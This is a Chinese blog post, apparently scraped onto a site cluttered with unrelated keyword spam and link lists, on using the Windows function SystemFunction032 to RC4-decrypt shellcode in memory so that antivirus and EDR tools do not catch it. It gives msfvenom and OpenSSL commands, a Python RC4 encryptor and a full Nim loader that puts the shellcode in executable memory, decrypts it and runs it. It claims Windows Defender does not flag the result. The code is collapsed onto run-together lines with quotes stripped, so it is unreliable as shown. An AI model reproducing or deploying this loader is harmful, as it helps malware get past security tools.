当前位置: 首页 > news >正文

瑞安商业网站建设商标自动生成免费软件

瑞安商业网站建设,商标自动生成免费软件,吴桥网站建设公司,网站建设有什么方法连接数据库什么是SystemFunction032函数#xff1f; 虽然Benjamin Delphi在2013年就已经在Mimikatz中使用了它#xff0c;但由于我之前对它的研究并不多#xff0c;才有了下文。 这个函数能够通过RC4加密方式对内存区域进行加密/解密。例如#xff0c;ReactOS项目的代码中显示…什么是SystemFunction032函数 虽然Benjamin Delphi在2013年就已经在Mimikatz中使用了它但由于我之前对它的研究并不多才有了下文。 这个函数能够通过RC4加密方式对内存区域进行加密/解密。例如ReactOS项目的代码中显示它需要一个指向RC4_Context结构的指针作为输入以及一个指向加密密钥的指针。 不过目前来看除了XOR操作至少我个人还不知道其他的针对内存区域加密/解密的替代函数。但是你可能在其他研究员的博客中也读到过关于规避内存扫描器的文章使用简单的XOR操作攻击者即使是使用了较长的密钥也会被AV/EDR供应商检测到。 初步想法 虽然RC4算法被认为是不安全的甚至多年来已经被各个安全厂商研究但是它为我们提供了一个更好的内存规避的方式。如果我们直接使用AES可能会更节省OpSec。但是一个简单的单一的Windows API是非常易于使用的。 通常情况下如果你想在一个进程中执行Shellcode你需要执行以下步骤。 1、打开一个到进程的句柄 2、在该进程中分配具有RW/RX或RWX权限的内存 3、将Shellcode写入该区域 4、(可选)将权限从RW改为RX以便执行 5、以线程/APC/回调/其他方式执行Shellcode。 为了避免基于签名的检测我们可以在执行前对我们的Shellcode进行加密并在运行时解密。 例如对于AES解密流程通常是这样的。 1、打开一个到进程的句柄 2、用RW/RX或RWX的权限在该进程中分配内存 3、解密Shellcode这样我们就可以将shellcode的明文写入内存中 4、将Shellcode写入分配的区域中 5、(可选)把执行的权限从RW改为RX 6、以线程/APC/回调/其他方式执行Shellcode 在这种情况下Shellcode本身在写入内存时可能会被发现例如被用户区的钩子程序发现因为我们需要把指向明文Shellcode的指针传递给WriteProcessMemory或NtWriteVirtualMemory。 XOR的使用可以很好的避免这一点因为我们还可以在将加密的值写入内存后XOR解密内存区域。简单来讲就像这样。 1、为进程打开一个句柄 2、在该进程中以RW/RX或RWX的权限分配内存 3、将Shellcode写入分配的区域中 4、XOR解密Shellcode的内存区域 5、(可选)把执行的权限从RW改为RX 6、以线程/APC/回调/其他方式执行Shellcode。 但是XOR操作很容易被发现。所以我们尽可能不去使用这种方式。 这里有一个很好的替代方案我们可以利用SystemFunction032来解密Shellcode然后将其写入内存中。 生成POC 首先我们需要生成Shellcode然后使用OpenSSL对它进行RC4加密。因此我们可以使用msfvenom来生成。 msfvenom -p windows/x64/exec CMDcalc.exe -f raw -o calc.bin cat calc.bin | openssl enc -rc4 -nosalt -k aaaaaaaaaaaaaaaa  enccalc.bin 但后来在调试时发现SystemFunction032的加密/解密方式与OpenSSL/RC4不同。所以我们不能这样做。 最终修改为 openssl enc -rc4 -in calc.bin -K echo -n aaaaaaaaaaaaaaaa | xxd -p -nosalt  enccalc.bin 我们也可以使用下面的Nim代码来获得一个加密的Shellcode blob仅Windows操作系统。 import winim import winim/lean# msfvenom -p windows/x64/exec CMDcalc.exe -f raw -o calc.bin const encstring  slurpcalc.binfunc toByteSeq*(str: string): seq[byte] {.inline.} ## Converts a string to the corresponding byte sequence.(str.toOpenArrayByte(0, str.high))proc SystemFunction032*(memoryRegion: pointer, keyPointer: pointer): NTSTATUS {.discardable, stdcall, dynlib: Advapi32, importc: SystemFunction032.}# This is the mentioned RC4 struct typeUSTRING*  objectLength*: DWORDMaximumLength*: DWORDBuffer*: PVOIDvar keyString: USTRING var imgString: USTRING# Our encryption Key var keyBuf: array[16, char]  [char a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a]keyString.Buffer  cast[PVOID](keyBuf) keyString.Length  16 keyString.MaximumLength  16var shellcode  toByteSeq(encstring) var size   len(shellcode)# We need to still get the Shellcode to memory to encrypt it with SystemFunction032 let tProcess  GetCurrentProcessId() echo Current Process ID: , tProcess var pHandle: HANDLE  OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess) echo Process Handle: , repr(pHandle) let rPtr  VirtualAllocEx(pHandle,NULL,cast[SIZE_T](size),MEM_COMMIT,PAGE_READ_WRITE )copyMem(rPtr, addr shellcode[0], size)# Fill the RC4 struct imgString.Buffer  rPtr imgString.Length  cast[DWORD](size) imgString.MaximumLength  cast[DWORD](size)# Call SystemFunction032 SystemFunction032(imgString, keyString)copyMem(addr shellcode[0],rPtr ,size)echo Writing encrypted shellcode to dec.binwriteFile(enc.bin, shellcode) # enc.bin contains our encrypted Shellcode 之后又写出了一个简单的Python脚本用Python脚本简化了加密的过程。 #!/usr/bin/env python3from typing import Iterator from base64 import b64encode# Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071 def key_scheduling(key: bytes) - list:sched  [i for i in range(0, 256)]i  0for j in range(0, 256):i  (i  sched[j]  key[j % len(key)]) % 256tmp  sched[j]sched[j]  sched[i]sched[i]  tmpreturn scheddef stream_generation(sched: list[int]) - Iterator[bytes]:i, j  0, 0while True:i  (1  i) % 256j  (sched[i]  j) % 256tmp  sched[j]sched[j]  sched[i]sched[i]  tmpyield sched[(sched[i]  sched[j]) % 256]        def encrypt(plaintext: bytes, key: bytes) - bytes:sched  key_scheduling(key)key_stream  stream_generation(sched)ciphertext  bfor char in plaintext:enc  char ^ next(key_stream)ciphertext  bytes([enc])return ciphertextif __name__  __main__:# msfvenom -p windows/x64/exec CMDcalc.exe -f raw -o calc.binwith open(calc.bin, rb) as f:result  encrypt(plaintextf.read(), keybaaaaaaaaaaaaaaaa)print(b64encode(result).decode()) 为了执行这个shellcode我们可以简单地使用以下Nim代码。 import winim import winim/lean# (OPTIONAL) do some Environmental Keying stuff# Encrypted with the previous code # Embed the encrypted Shellcode on compile time as string const encstring  slurpenc.binfunc toByteSeq*(str: string): seq[byte] {.inline.} ## Converts a string to the corresponding byte sequence.(str.toOpenArrayByte(0, str.high))proc SystemFunction032*(memoryRegion: pointer, keyPointer: pointer): NTSTATUS {.discardable, stdcall, dynlib: Advapi32, importc: SystemFunction032.}typeUSTRING*  objectLength*: DWORDMaximumLength*: DWORDBuffer*: PVOIDvar keyString: USTRING var imgString: USTRING# Same Key var keyBuf: array[16, char]  [char a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a]keyString.Buffer  cast[PVOID](keyBuf) keyString.Length  16 keyString.MaximumLength  16var shellcode  toByteSeq(encstring) var size   len(shellcode)let tProcess  GetCurrentProcessId() echo Current Process ID: , tProcess var pHandle: HANDLE  OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)let rPtr  VirtualAllocEx(pHandle,NULL,cast[SIZE_T](size),MEM_COMMIT,PAGE_EXECUTE_READ_WRITE )copyMem(rPtr, addr shellcode[0], size)imgString.Buffer  rPtr imgString.Length  cast[DWORD](size) imgString.MaximumLength  cast[DWORD](size)# Decrypt memory region with SystemFunction032 SystemFunction032(imgString, keyString)# (OPTIONAL) we could Sleep here with a custom Sleep function to avoid memory Scans# Directly call the Shellcode instead of using a Thread/APC/Callback/whateverlet f  cast[proc(){.nimcall.}](rPtr) f() 最终效果至少windows defender不会报毒。 通过使用这个方法我们几乎可以忽略用户区的钩子程序因为我们的明文Shellcode从未被传递给任何函数只有SystemFunction032本身。当然所有这些供应商都可以通过钩住Advapi32/SystemFunction032来检测我们。 后记 之后我想到了一个更加完美的想法。通过使用PIC-Code我们也可以省去我的PoC中所使用的其他Win32函数。因为在编写PIC-Code时所有的代码都已经被包含在了.text部分而这个部分通常默认有RX权限这在很多情况下是已经足够了。所以我们不需要改变内存权限也不需要把Shellcode写到内存中。 简单来讲是以下这种情况 1、调用SystemFunction032来解密Shellcode  2、直接调用它 例如PIC-Code的样本代码可以在这里找到。对于Nim语言来说之前发布了一个库它也能让我们相对容易地编写PIC代码叫做Bitmancer。
http://www.dnsts.com.cn/news/150053.html

相关文章:

  • 用手机做兼职的网站wordpress postfix
  • 网站后台登陆代码wordpress邮箱评论
  • 网站名称搜索不到视频网站哪个做的好处
  • wordpress站点logo手机网站内容设计方案
  • 联合智慧旅游建设旅游门户网站网站后台制作教程
  • 怎样做网站框架图求一个网站开发接项目的平台
  • 网站建设文件夹名字建设通网站是做什么的
  • 地产网站建设网站建设教程 金旭亮
  • 兖州网站制作wordpress不能添加用户
  • 网站做的比较好的贸易公司跨境电商平台有哪些前期费用
  • wordpress访问网站很慢门户网站是啥意思
  • 网站建设情况的自查报告常州网站制作
  • 运城 网站 建设 招聘wordpress 主要
  • dede旅游网站源码 多城市凡科做网站需要备案吗
  • 网站设计 书籍一级做a爱免费网站
  • 用wordpress建站网页设计与制作教程西北工业大学出版社
  • 网站开发行业信息网做文化传播公司网站
  • 惠州网站建设企业上海网络优化seo
  • 网站ipc备案2024年的新闻
  • 山东建设厅网站网址科技局网站查新怎么做
  • 铭做网站建设赣州做网站建设
  • 怎么自己建立网站及建立网站方法山西网络推广哪家专业
  • 网站开发新闻上海营销型网站报价
  • 怎样建立自己的网站卖东西工业设计厂家
  • 房山网站建设优化seo深圳o2o网站建设
  • 个人如何建立公司网站云开发小程序源码
  • 北京网站建设排名浩森宇特做网站上是外部连接怎么改
  • 速冻蔬菜做哪个国际网站好做川菜的网站
  • 服装图案素材网站wordpress根目录修改主题
  • 网站vip怎么做wordpress安装主题链接路径